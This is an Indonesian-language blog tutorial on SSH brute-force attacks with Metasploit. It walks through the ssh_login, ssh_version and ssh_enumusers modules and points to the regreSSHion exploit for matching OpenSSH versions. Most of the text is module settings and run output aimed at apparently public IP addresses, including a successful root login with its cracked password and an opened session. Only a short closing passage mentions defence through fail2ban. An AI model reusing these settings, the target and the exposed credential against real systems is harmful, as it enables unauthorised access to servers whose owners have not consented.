Brute Force Login SSH dengan scanner/ssh/ssh_login
SSH (Secure Shell) adalah protokol jaringan yang digunakan untuk mengamankan komunikasi antara dua sistem, terutama dalam lingkungan yang tidak aman, seperti internet. SSH memungkinkan pengguna untuk melakukan akses jarak jauh ke sistem lain, mengelola file, dan mengeksekusi perintah melalui jaringan dengan cara yang aman. Protokol ini banyak digunakan oleh administrator sistem dan pengembang untuk mengelola server, router, dan perangkat jaringan lainnya.
Fitur Utama SSH:
Contents
- Keamanan: SSH mengenkripsi semua data yang ditransmisikan antara klien dan server, termasuk perintah, file, dan data lain, sehingga melindungi dari intersepsi oleh pihak ketiga.
- Autentikasi: SSH mendukung beberapa metode autentikasi, seperti password, kunci publik, dan otentikasi berbasis sertifikat.
- Pengelolaan Jarak Jauh: SSH memungkinkan pengelolaan sistem jarak jauh melalui baris perintah atau terminal grafis (misalnya dengan X11 forwarding).
- Port Forwarding: SSH mendukung tunneling atau port forwarding, memungkinkan pengguna untuk mengamankan lalu lintas dari protokol yang tidak terenkripsi.
- Transfer File Aman: Protokol SCP (Secure Copy) dan SFTP (SSH File Transfer Protocol) digunakan untuk mengirim dan menerima file dengan aman melalui SSH.
Beberapa modul untuk pentest di kali linux (msfconsole) seperti ssh_login, ssh_version, ssh_enumusers bisa kita gunakan untuk mengetahui sejauh mana server ssh aman dari serangan.
Brute Force Login SSH
Brute force login ssh bisa menggunakan modul scanner/ssh/ssh_login tapi sebaiknya sudah mendapatkan username nya sehingga kita tinggal menyiapkan pass_file name nya. Berikut contoh settingan yang akan kita gunakan untuk melakukan exploit.
Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- ANONYMOUS_LOGIN false yes Attempt to login with a blank username and password BLANK_PASSWORDS false no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 CreateSession true no Create a new session for every successful login DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list DB_SKIP_EXISTING none no Skip existing credentials stored in the current database (Accepted: none, user, user&realm) PASSWORD no A specific password to authenticate with PASS_FILE /Users/user/Desktop/pwd.txt no File containing passwords, one per line RHOSTS 103.170.210.160 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html RPORT 22 yes The target port STOP_ON_SUCCESS true yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads (max one per host) USERNAME root no A specific username to authenticate as USERPASS_FILE no File containing users and passwords separated by space, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE no File containing usernames, one per line VERBOSE true yes Whether to print output for all attempts
hasil ketika berhasil
msf6 auxiliary(scanner/ssh/ssh_login) > run [*] 103.175.220.161:22 - Starting bruteforce [-] 103.175.220.161:22 - Failed: 'bejopamungkas:565656565' [!] No active DB -- Credential data will not be saved! [-] 103.175.220.161:22 - Failed: 'root:sdsdsdsds' [-] 103.175.220.161:22 - Failed: 'root:Password' [-] 103.175.220.161:22 - Failed: 'root:http' [-] 103.175.220.161:22 - Failed: 'root:factory' [-] 103.175.220.161:22 - Failed: 'root:RIP000' [-] 103.175.220.161:22 - Failed: 'root:12345' [-] 103.175.220.161:22 - Failed: 'root:1234admin' [-] 103.175.220.161:22 - Failed: 'root:ANYCOM' [-] 103.175.220.161:22 - Failed: 'root:ILMI' [+] 103.175.220.161:22 - Success: 'root:rootadmin' 'uid=1000(root) gid=1000(root) groups=1000(root),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),118(netdev),119(lxd) ' [*] SSH session 1 opened (192.168.0.102:49955 -> 103.170.210.160:22) at 2024-09-19 08:58:26 +0700 [-] 103.170.210.160:22 - While a session may have opened, it may be bugged. If you experience issues with it, re-run this module with 'set gatherproof false'. Also consider submitting an issue at github.com/rapid7/metasploit-framework with device details so it can be handled in the future. [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
Get Version SSH Server
Kita juga bisa mengumpulkan informasi mengenai version SSH server dengan menggunakan modul scanner/ssh/ssh_version). Contoh dengan settingan berikut
msf6 auxiliary(scanner/ssh/ssh_version) > info Name: SSH Version Scanner Module: auxiliary/scanner/ssh/ssh_version License: Metasploit Framework License (BSD) Rank: Normal Provided by: Daniel van Eeden <metasploit@myname.nl> h00die Check supported: No Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- EXTENDED_CHECKS true yes Check for cryptographic issues RHOSTS 103.170.210.160 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html RPORT 22 yes The target port THREADS 1 yes The number of concurrent threads (max one per host) TIMEOUT 30 yes Timeout for the SSH probe Description: Detect SSH Version, and the server encryption References: https://en.wikipedia.org/wiki/SecureShell https://datatracker.ietf.org/doc/html/rfc8732#name-deprecated-algorithms https://datatracker.ietf.org/doc/html/draft-ietf-curdle-ssh-kex-sha2-20#page-16 https://datatracker.ietf.org/doc/html/rfc8758#name-iana-considerations https://github.com/net-ssh/net-ssh?tab=readme-ov-file#supported-algorithms https://nvd.nist.gov/vuln/detail/CVE-2008-5161 View the full module info with the info -d command.
hasilnya kita dapat mendapatkan versi ssh servernya
msf6 auxiliary(scanner/ssh/ssh_version) > run [*] 103.170.210.160 - Key Fingerprint: ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBDVFMVPOhhhzOeLgNXDtRGZJyxiOgjz2J0g5HUS8q+r [*] 103.170.210.160 - SSH server version: SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.10 [*] 103.170.210.160 - Server Information and Encryption ================================= Type Value Note ---- ----- ---- encryption.compression none encryption.compression zlib@openssh.com encryption.encryption aes256-gcm@openssh.com encryption.encryption chacha20-poly1305@openssh.com encryption.encryption aes128-ctr encryption.encryption aes256-ctr encryption.encryption aes192-ctr encryption.encryption aes128-gcm@openssh.com encryption.hmac hmac-sha1-etm@openssh.com encryption.hmac umac-128@openssh.com encryption.hmac hmac-sha2-256 encryption.hmac hmac-sha2-512 encryption.hmac hmac-sha1 encryption.hmac umac-128-etm@openssh.com encryption.hmac hmac-sha2-256-etm@openssh.com encryption.hmac hmac-sha2-512-etm@openssh.com encryption.hmac umac-64@openssh.com encryption.hmac umac-64-etm@openssh.com encryption.host_key rsa-sha2-512 encryption.host_key rsa-sha2-256 encryption.host_key ecdsa-sha2-nistp256 Weak elliptic curve encryption.host_key ssh-ed25519 encryption.key_exchange diffie-hellman-group18-sha512 encryption.key_exchange curve25519-sha256 encryption.key_exchange curve25519-sha256@libssh.org encryption.key_exchange ecdh-sha2-nistp256 encryption.key_exchange ecdh-sha2-nistp384 encryption.key_exchange ecdh-sha2-nistp521 encryption.key_exchange sntrup761x25519-sha512@openssh.com encryption.key_exchange diffie-hellman-group-exchange-sha256 encryption.key_exchange diffie-hellman-group16-sha512 encryption.key_exchange diffie-hellman-group14-sha256 encryption.key_exchange kex-strict-s-v00@openssh.com fingerprint_db ssh.banner openssh.comment Ubuntu-3ubuntu0.10 os.certainty 0.75 os.cpe23 cpe:/o:canonical:ubuntu_linux:- os.family Linux os.product Linux os.vendor Ubuntu service.cpe23 cpe:/a:openbsd:openssh:8.9p1 service.family OpenSSH service.product OpenSSH service.protocol ssh service.vendor OpenBSD service.version 8.9p1 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
Bila versi nya cocok, kita bisa menggunakan https://blog.bitnami.com/2024/07/regresshion-code-execution.html
regreSSHion: Code Execution Vulnerability in OpenSSH server (CVE-2024-6387)
Kalian bisa menggunakan tools berikut untuk melakukan exploit nya.
Enum user
Untuk enum user bisa menggunakan modul scanner/ssh/ssh_enumusers namun kadang bisa berhasil atau tidak. https://github.com/rapid7/metasploit-framework/issues/15676
This technique will not work on modules which do not have public key authentication enabled.
Cara menanggulanginya
Untuk menanggulangi brute force bisa kita gunakan mekanisme try login attempts yaitu tools bernama fail2ban yang ditulis menggunakan bahasa python. Nanti tools tersebut akan membaca log login dan melakukan analisis untuk menentukan pemblokiran IP address jika melakukan kesalahan berkali-kali ketika login.
Akan dibahas selanjutnya mengenai fail2ban.